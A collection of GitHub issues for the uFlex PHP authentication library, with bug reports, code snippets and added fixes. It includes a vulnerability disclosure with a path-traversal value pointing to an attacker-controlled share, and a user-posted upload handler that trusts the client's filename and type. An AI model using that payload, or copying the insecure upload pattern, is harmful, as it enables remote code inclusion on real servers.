
uflex's Issues

Unclear how to set user timeout

I'm finding that after a little time, $user->isSigned() is returning false, and I think this is due to the user's login session timing out. How do I alter things so that the user stays logged in for longer?

newPassword(), update() broken validation - $ Bounty

I was trying to update uFlex to password_hash and password_verify and thought I seriously broke things. I set up a new domain with a clean uflex demo install and verified the issue is in the base code.

The change password functions, as seen on /update/password:

  • will give "password changed" regardless of actual success
  • validation rules are enforced only silently
  • if validation rules are not met, the password is not changed, but the "password changed" success message and redirect still occur
  • user believes the password is changed and has no way of knowing
  • unsure of this one, maybe it's because the above is broken or maybe it's a security thing, but when changing a password with a hash it will act like there is a success with any hash, even invalid or expired. No feedback for the user.

I haven't been able to figure out the solution myself yet.

Since this is a soon to be live project, I am placing a bounty of $75 via PayPal to whoever fixes this. This is roughly 1/3 of my income for this project, so I consider it fair for how much time uFlex saved me.

Thanks in advance.

pass_reset($email)

When using this method, there is no reset of the actual ability of a user to log in using their old password.

Example.
User resets his pass
User logs in using his old pass

If a password is reset I would assume that the function pass_reset, should just wipe the current password field. I feel that is a better option than setting activation back to 0.

What do you think?

Mac & register user

Hey bro, still using uFlex in my framework (https://github.com/APlusDesign/Website-Framework) and a few companies are wanting to use it for their staff, but I've had a long standing problem that I need you to look into before I can hand it over.

Everything works great on a PC, using Wamp/php 5 etc, but we keep getting an error on macs.

When we try to register a user via uFlex we get "New User Registration Failed". I have tested throughout my framework that I can insert a user from any point using basic MySql commands with no issue (not using uFlex methods), I also know that uFlex can read from the database because all other functions like username uniqueness are working so I know it has the right DB settings. I must stress again, it only fails when trying to register a user via


$data = array(
    'username'  => $_REQUEST['username'],
    'password'  => $_REQUEST['password'],
    'password2' => $_REQUEST['password2'],
    'email'     => $_REQUEST['email']
);
$user->register($data, true);

On the mac these are the environment variables

Server version: Apache/2.2.22 (Unix)
Server built: Aug 24 2012 17:16:58
mysql-5.6.10
PHP 5.3.15

which always produces "New User Registration Failed"

I tried to debug it myself but failed, have you got any ideas?

getRow() used incorrectly

Hi there,

I started using uFlex tonight, and I have run into a bug. It took me ages to track it down, but I did. Take a look at this line in your main php file. You use rowCount() to check whether a statement has returned rows.

Now read this quote from here:
"If the last SQL statement executed by the associated PDOStatement was a SELECT statement, some databases may return the number of rows returned by that statement. However, this behaviour is not guaranteed for all databases and should not be relied on for portable applications."

I ran into this error when testing out your code. I tried to create a test user, and it worked! But it created duplicates of the user every time I ran the script, instead of returning errors. It turns out that most database implementations don't return rows 'affected' by a SELECT. I have been passing my own (sqlite) connection to uFlex. It makes sense that you didn't get to this in your own testing.

I'll be making some changes to your code to get it to work for me. If you like I can make a pull request when I'm done.

Cheers,
Scott.

How to create new user if currently signed in?

NOTE: If a signed user needs to register a new user,
use the User::manageUser() function to create a new user
object which can then be used to register a new user.

How exactly does this work, can you provide example?

Plain text password problem

The register function in the user class will NOT hash the password if the array key is lowercase. At first I thought it didn't support hashing until I noticed the documentation said that it did hash passwords. Upon reviewing the code I noticed that the following lines in Users.php expect a capitalized password key (ex. Password instead of password).

User.php

//Hash Password
if ($info->Password) {
    $info->Password = $this->hash->generateUserPassword($this, $info->Password);
}

It saves to the database just fine giving the lowercase version to register, but is plain text instead of a hash. Oops.

Version 1.0 release & updates

Status

The 1.0 release is under development. While the class will be a complete overhaul, its functionality will remain the same or very similar.

Goal

For the 1.0 release I'm aiming for a more modular and testable design, moving away from squeezing everything into a single file and class. The release should be compatible with the popular PHP dependency manager Composer. The class and all its components should be properly namespaced and compatible with the PSR-2 and PSR-4 standards.

While there will still be a single main user object, this main object will be internally subdivided into smaller more manageable classes.

Why?

This is what makes sense to keep the project current and future proof, and to make it easier to integrate into today's projects, which most likely autoload classes and integrate other third-party libraries or frameworks.

Getting Involved

Any ideas, questions or suggestions can be posted on this thread. I'll keep the new development branch https://github.com/ptejada/uFlex/tree/1.0-DEV up to date with the current progress. Suggestions, collaboration and pull requests are welcome.

Problem uploading files/photos

Hi!
I'm building a website with a uFlex base, and I can't upload files with version 1.0.
I'm using the page & ps folders. I have a form in the page folder which calls a ps php file, and this file doesn't receive the $_FILE variable. If I use the same form outside the uFlex structure, writing the absolute path in the address bar, the ps php file receives $_FILE and works perfectly.
So I suppose there is something in the uFlex structure that overwrites my $_FILE array, but I couldn't find it. The point is that $_POST["test"] is received but $_FILE is not.
May I get some help?
Here we have my page/new_campaign.php

<div class="row">
    <div class="col-sm-6 col-sm-offset-3">
        <h2>New campaign</h2>
        <hr/>
        <form action="ps/new_campaign.php" method="post" enctype="multipart/form-data">
            <div class="form-group">
                <label>test:</label>
                <input type="text" name="test" id="test" class="form-control"><br>
            </div>
            <div class="form-group">
                <label for="file">Filename:</label>
                <input type="file" name="file" id="file"><br>
            </div>
            <input type="submit" name="submit" value="Submit" class="btn btn-primary">
        </form>
    </div>
</div>

And here we have my ps/new_campaign.php

<?php
$allowedExts = array("gif", "jpeg", "jpg", "png");
// Extension is taken from the uploaded file name (last dot-separated part)
$temp = explode(".", $_FILES["file"]["name"]);
$extension = end($temp);

// Accept only image MIME types (as reported by the browser), files under 20000 bytes
// and one of the allowed extensions
if ((($_FILES["file"]["type"] == "image/gif")
|| ($_FILES["file"]["type"] == "image/jpeg")
|| ($_FILES["file"]["type"] == "image/jpg")
|| ($_FILES["file"]["type"] == "image/pjpeg")
|| ($_FILES["file"]["type"] == "image/x-png")
|| ($_FILES["file"]["type"] == "image/png"))
&& ($_FILES["file"]["size"] < 20000)
&& in_array($extension, $allowedExts)) {
    if ($_FILES["file"]["error"] > 0) {
        // PHP reported an upload error (see UPLOAD_ERR_* constants)
        $varEcho = "Return Code: " . $_FILES["file"]["error"] . "<br>";
    } else {
        $varEcho = "Upload: " . $_FILES["file"]["name"] . "<br>";
        $varEcho .= "Type: " . $_FILES["file"]["type"] . "<br>";
        $varEcho .= "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
        $varEcho .= "Temp file: " . $_FILES["file"]["tmp_name"] . "<br>";
        if (file_exists("../upload/" . $_FILES["file"]["name"])) {
            $varEcho .= $_FILES["file"]["name"] . " already exists. ";
        } else {
            // Move the temporary upload into the upload/ directory
            move_uploaded_file($_FILES["file"]["tmp_name"], "../upload/" . $_FILES["file"]["name"]);
            $varEcho .= "Stored in: " . "upload/" . $_FILES["file"]["name"];
        }
    }
} else {
    $varEcho = "Invalid file";
}

echo $varEcho;
?>

Problem with js under Chrome

Windows 8.1, Chrome ver 48.0.2564.116 m
Chrome dev console said:

Uncaught TypeError: button.button is not a function
(anonymous function) @ main.js:6
jQuery.event.dispatch @ jquery.js:4732
elemData.handle @ jquery.js:4544

The browser said (url: public/ps/login.php):

{"error":[],"confirm":"You are now login as madaras<\/b>","form":[]}

It's generated in Chrome only at login, password change and password reset.

Firefox and IE have no error at all.

PDO general error on login() (LogLogin)

I am able to reproduce (not very easily) a general error when my user login a couple of times in a row (because of page reloading).

Basically it appears that a fetchAll is called on an UPDATE query (which is not supposed to happen).

Flow:
login() calls LogLogin() which calls runQuery() with $arguments not being false
the request is quite simple: UPDATE _table_ SET LastLogin=:stamp WHERE ID=:id

Line 193 in DB_Table:

        // If there are no arguments, execute the statement
        if (!$arguments) {
            $stmt->execute();
        }

        $rows = $stmt->rowCount();
        $rows = ($rows > 0) ? $rows : count($stmt->fetchAll());

Trace:

PHP Fatal error:  Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error' in /var/www/default/tools/vendor/ptejada/uflex/src/DB_Table.php:202
Stack trace:
#0 /var/www/default/tools/vendor/ptejada/uflex/src/DB_Table.php(202): PDOStatement->fetchAll()
#1 /var/www/default/tools/vendor/ptejada/uflex/src/User.php(295): ptejada\uFlex\DB_Table->runQuery('UPDATE _table_ ...', Array)
#2 /var/www/default/tools/vendor/ptejada/uflex/src/User.php(96): ptejada\uFlex\User->logLogin()
#3 /var/www/default/lib/classUFlex.php(15): ptejada\uFlex\User->login('', '', false)
#4 /var/www/default/tools/vendor/ptejada/uflex/src/User.php(279): classUFlex->login()
#5 /var/www/default/modules/header/header.php(7): ptejada\uFlex\User->start(true)
#6 /var/www/default/lib/classExecuter.php(78): header->__construct(Object(Executer), Object(Smarty))
#7 /var/www/default/lib/classExecuter.php(36): Executer->loadModules()
#8 /var/www/default/lib/classCore.php(443): Executer->__construct(Object(Smarty), Object(classLanguages), Object(PDO),  in /var/www/default/tools/vendor/ptejada/uflex/src/DB_Table.php on line 202
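The two reports above ("getRow() used incorrectly" and this one) share a root cause: runQuery() treats rowCount() as a row count for SELECTs and falls back to fetchAll() on statements that return no result set. The helper below is an added example, not uFlex's own code, showing the portable split: fetch rows for SELECT, rowCount() only for data-modifying statements, and an existence check that fetches a column instead of trusting rowCount(). It builds its own in-memory SQLite table so it runs stand-alone; the users table layout is constructed for the example.

```php
<?php
// Added example (not uFlex's own DB_Table code). Assumes PDO with the sqlite driver.

/**
 * Run a prepared query and return what the caller can rely on portably:
 *   - SELECT (or other row-returning statements): the fetched rows (possibly empty)
 *   - INSERT/UPDATE/DELETE: the affected-row count from rowCount()
 * Never calls fetchAll() on a statement without a result set.
 */
function runQueryPortable(PDO $db, string $sql, array $arguments = [])
{
    $stmt = $db->prepare($sql);
    $stmt->execute($arguments);   // an empty array is fine when there are no placeholders

    // Decide by statement kind, not by rowCount(): PDO only guarantees rowCount()
    // for data-modifying statements, and fetchAll() on an UPDATE raises
    // "General error" on some drivers (the trace above).
    $returnsRows = preg_match('/^\s*(SELECT|WITH|PRAGMA)\b/i', $sql) === 1;
    if ($returnsRows) {
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    }
    return $stmt->rowCount();
}

/** Portable uniqueness check: fetch one column instead of trusting rowCount(). */
function valueExists(PDO $db, string $table, string $column, string $value): bool
{
    // Table and column names come from code, never from the client; the value is bound.
    $stmt = $db->prepare("SELECT 1 FROM {$table} WHERE {$column} = :v LIMIT 1");
    $stmt->execute([':v' => $value]);
    return $stmt->fetchColumn() !== false;
}

// Constructed sample database (mirrors the Username/LastLogin columns named above)
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (ID INTEGER PRIMARY KEY, Username TEXT, LastLogin INTEGER)');
$db->exec("INSERT INTO users (Username, LastLogin) VALUES ('scott', 0)");

// SELECT: rows come back even on drivers where rowCount() reports 0 for SELECT
$rows = runQueryPortable($db, 'SELECT ID, Username FROM users WHERE Username = :u', [':u' => 'scott']);
printf("select returned %d row(s)\n", count($rows));

// UPDATE (the LogLogin statement): affected-row count, and no fetchAll() is attempted
$changed = runQueryPortable($db, 'UPDATE users SET LastLogin = :stamp WHERE ID = :id',
                            [':stamp' => time(), ':id' => 1]);
printf("update affected %d row(s)\n", $changed);

// Duplicate-registration guard that works on SQLite as well as MySQL
var_dump(valueExists($db, 'users', 'Username', 'scott'));
var_dump(valueExists($db, 'users', 'Username', 'nobody'));
```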

Insecure page include in example

The example demo/index.php does not validate the page variable sent from the client. This means that arbitrary scripts could be included.

If the page included were to have .. in the path, files in parent directories can be included (this can cause unintended execution of other php scripts on the system).

On some systems this could even be exploited remotely (Consider a system with autofs enabled by default, with /net as a dynamic mount point -- as is the case on RHEL) and a site where this index.php lives under /var/www. An attacker could send a page=../../../net/attackerdomain.com/share/myMaliciousPage , which would be translated to page/../../../net/attackerdomain.com/share/myMaliciousPage.php .

The example should be changed to white-list valid characters coming from the client.
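One way to apply that recommendation, as an added example rather than the demo's own code: validate the page name against a strict character allow-list, then confirm the resolved path is still inside the page directory. The `page/` layout with one `.php` per page is assumed for illustration.

```php
<?php
// Added example (not part of the uFlex demo). Assumes pages live as page/<name>.php.

const PAGE_DIR = __DIR__ . '/page';

/**
 * Return the absolute path of the page script to include, or null when the
 * request must be rejected. Two independent checks:
 *   1. the name must match a strict character allow-list (no '.', '/', '\'),
 *   2. the resolved path must still lie inside PAGE_DIR (defence in depth).
 */
function resolvePage(?string $page, string $default = 'home'): ?string
{
    if ($page === null || $page === '') {
        $page = $default;
    }

    // Allow-list: letters, digits, underscore and hyphen only. This rejects '..',
    // directory separators, null bytes and anything that is not a plain name.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }

    $real = realpath(PAGE_DIR . '/' . $page . '.php');
    $base = realpath(PAGE_DIR);
    if ($real === false || $base === false) {
        return null;                 // page (or page directory) does not exist
    }
    // Containment check: the real path must start with "<base>/".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// How the demo's index.php would use it:
//   $target = resolvePage($_GET['page'] ?? null);
//   if ($target === null) { http_response_code(404); exit('Page not found'); }
//   include $target;

// Constructed inputs, showing what the allow-list alone accepts or rejects
foreach (['home', 'reset-password', '../other/page', "home\0", 'a/b', ''] as $p) {
    $ok = preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $p) === 1;
    printf("%-20s %s\n", json_encode($p), $ok ? 'allowed' : 'rejected');
}
```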

Version 2.0.0 development

Features to implement:

  • Automatically expire the session after a period of time without being accessed.
  • Add support for PHP 5.5 password_* functions.
  • Add backward compatibility to PHP 5.3 and 5.4 for password_* functions.
  • Update the default password complexity.
  • Review the included demo for security improvements.
  • Refactor the built-in errors and handlers.
  • Decouple the bundled demo into its own project.

Original request #38

Just a proposal

On changing the password, if the new password is the same as the old one, it should throw up an error instead of the "password not changed" error. Will make a PR if I can do it soon, or else this is just a proposal.

Empty input fields don't output to $user->log->getErrors()

This may be by design, but the behavior has changed since I updated from 1.x

If a user hits login and the POST fields, or in this case REQUEST fields, are empty, the $user->log->getErrors() array is empty:

$username = $this->check_input($_REQUEST['username']);   // username = ""
$password = $this->check_input($_REQUEST['password']);   // password = ""
$auto     = (isset($_REQUEST['auto']) ? $_REQUEST['auto'] : 0);
$user->login($username, $password, $auto);

It used to produce an error if the password or user fields were empty, now it does not, is this by design or just something that got missed?

Also, no, I don't check it client side, as it's a simple transport method dealing with these requests; all validation logic happens behind the scenes, some of which, e.g. for login, I used to rely on the $user class to produce the correct error for me. Now it's just an empty array.

Provide demo app

Hi,

Can you please also provide the demo app so we could see it all working together.

Thanks

Security improvements

I've made some improvements to the security of uFlex, both in the core files and the demo:

  • filtering get/post arrays
  • timeout session after X minutes of inactivity
  • recaptcha for login/register/forgot password
  • switching to PHP's password_hash and password_verify for password storage
  • password complexity (min length, can't contain username, compare to list of common passwords, require upper/numeric/symbol)

A lot of it is just jammed in for my use, but I could clean some of it up and PR it if you were at all interested.

For most of them we would want them to be opt-in, for example changing hash methods would obviously invalidate all passwords in an upgraded DB. I suppose the best place to put these options would be config.php. Only thing is I'm new to OOP so I'm not sure the best way to store the options and don't want to mess up your coding style.

Multiple record for registering

Hi, I've tried to register a user and found out that the script allows me to create the same non-unique users. I found the problem lines in the code:
From:

        if ($info->Password) {
            $info->Password = $this->hash->generateUserPassword($this, $info->Password);
        }

        //Check for Email in database
        if ($info->Email) {
            if ($this->table->isUnique('Email', $info->Email, 16)) {
                return false;
            }
        }

        //Check for Username in database
        if ($info->Username) {
            if ($this->table->isUnique('Username', $info->Username, 17)) {
                return false;
            }
        }

To:

        if ($info->password) {
            $info->password = $this->hash->generateUserPassword($this, $info->password);
        }

        //Check for Email in database
        if ($info->email) {
            if ($this->table->isUnique('Email', $info->email, 16)) {
                return false;
            }
        }

        //Check for Username in database
        if ($info->username) {
            if ($this->table->isUnique('Username', $info->username, 17)) {
                return false;
            }
        }

And everything worked like a charm.
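The "Plain text password problem" report and this one are the same defect: a register() that checks only `$info->Password` / `$info->Email` / `$info->Username` silently skips hashing and uniqueness checks when the caller sends lowercase keys, and the bounty report above shows the same "silent success" pattern on password update. The code below is an added example, not uFlex's register(): it normalises key casing first, returns an explicit error list so a caller can never report success when nothing was stored, checks uniqueness by fetching, and stores passwords with password_hash() (PHP 5.5+). The users table is constructed in-memory for the example.

```php
<?php
// Added example (not uFlex's own code). Assumes PDO with the sqlite driver and PHP >= 5.5.

/** Map whatever key casing the caller used onto the canonical column names. */
function normaliseUserInput(array $data): array
{
    $canonical = ['username' => 'Username', 'password' => 'Password',
                  'password2' => 'Password2', 'email' => 'Email'];
    $out = [];
    foreach ($data as $key => $value) {
        $name = $canonical[strtolower($key)] ?? $key;
        $out[$name] = is_string($value) ? trim($value) : $value;
    }
    return $out;
}

/**
 * Register a user. Returns [] on success, otherwise a list of error strings,
 * so the caller cannot show "success" unless a row was actually inserted.
 */
function registerUser(PDO $db, array $raw): array
{
    $info = normaliseUserInput($raw);
    $errors = [];

    if (($info['Username'] ?? '') === '') { $errors[] = 'Username is required'; }
    if (!filter_var($info['Email'] ?? '', FILTER_VALIDATE_EMAIL)) { $errors[] = 'Invalid email'; }
    if (strlen($info['Password'] ?? '') < 8) { $errors[] = 'Password must be at least 8 characters'; }
    if (($info['Password'] ?? null) !== ($info['Password2'] ?? null)) { $errors[] = 'Passwords do not match'; }
    if ($errors) { return $errors; }

    // Uniqueness via fetch, not rowCount(); values are bound, column names are fixed.
    foreach (['Username', 'Email'] as $col) {
        $stmt = $db->prepare("SELECT 1 FROM users WHERE {$col} = :v LIMIT 1");
        $stmt->execute([':v' => $info[$col]]);
        if ($stmt->fetchColumn() !== false) { $errors[] = "{$col} already in use"; }
    }
    if ($errors) { return $errors; }

    // The password is hashed regardless of the key casing the caller used.
    $stmt = $db->prepare('INSERT INTO users (Username, Email, Password) VALUES (:u, :e, :p)');
    $stmt->execute([':u' => $info['Username'], ':e' => $info['Email'],
                    ':p' => password_hash($info['Password'], PASSWORD_DEFAULT)]);
    return [];
}

// Constructed sample run
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (ID INTEGER PRIMARY KEY, Username TEXT, Email TEXT, Password TEXT)');

$form = ['username' => 'alice', 'password' => 'correct horse battery',
         'password2' => 'correct horse battery', 'email' => 'alice@example.com'];
var_dump(registerUser($db, $form));   // first call: created
var_dump(registerUser($db, $form));   // second call: duplicate Username and Email reported

$stored = $db->query("SELECT Password FROM users WHERE Username = 'alice'")->fetchColumn();
var_dump(password_verify('correct horse battery', $stored)); // matches the stored hash
var_dump($stored !== 'correct horse battery');               // nothing stored in plain text
```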

Wrong Username or Password with good credentials

Hello,

I've installed your class through Composer.
My user has been created without problem via register().
But I cannot log in with the good username and password (in clear).

It's the good login and password, and I printed the post values and they're the same.
How can I debug that?

Error : Wrong username or password

$user = new Login();
$user->logout();
$user->login($_POST['username'], $_POST['password'], false);
if ($user->isSigned()) {
    echo "User Successfully Logged in";
} else {
    foreach ($user->log->getErrors() as $err) {
        echo "Error: {$err}\n";
    }
}

Thanks

Activation Errors not showing on login form

Activation errors (errors 8,9,14) are not showing on the login screen.

Example:
Trying an incorrect login and password, you get an inline error message that there is an error and why.

Trying to login to an account that has yet to be activated, you get no error message at all. Unclear why to the user.

I don't know how to use Github or do a Pull request at all, but here is the solution. The formError log function is not being called for these errors.

In User.php, lines 182-199 are currently this:

            //If Account is not Activated
            if ($userFile->Activated == 0) {
                if ($userFile->LastLogin == 0) {
                    //Account has not been activated
                    $this->log->error(8);
                } else {
                    if (!$userFile->Confirmation) {
                        //Account has been deactivated
                        $this->log->error(9);
                    } else {
                        //Account deactivated due to a password reset or reactivation request
                        $this->log->error(14);
                    }
                }
                // Remove the signed flag
                $this->session->signed = 0;
                return false;
            }

Update them to this:

            //If Account is not Activated
            if ($userFile->Activated == 0) {
                if ($userFile->LastLogin == 0) {
                    //Account has not been activated
                    $this->log->error(8);
                    $this->log->formError('Password', $this->errorList[8]);
                } else {
                    if (!$userFile->Confirmation) {
                        //Account has been deactivated
                        $this->log->error(9);
                        $this->log->formError('Password', $this->errorList[9]);
                    } else {
                        //Account deactivated due to a password reset or reactivation request
                        $this->log->error(14);
                        $this->log->formError('Password', $this->errorList[14]); 
                    }
                }
                // Remove the signed flag
                $this->session->signed = 0;
                return false;
            }
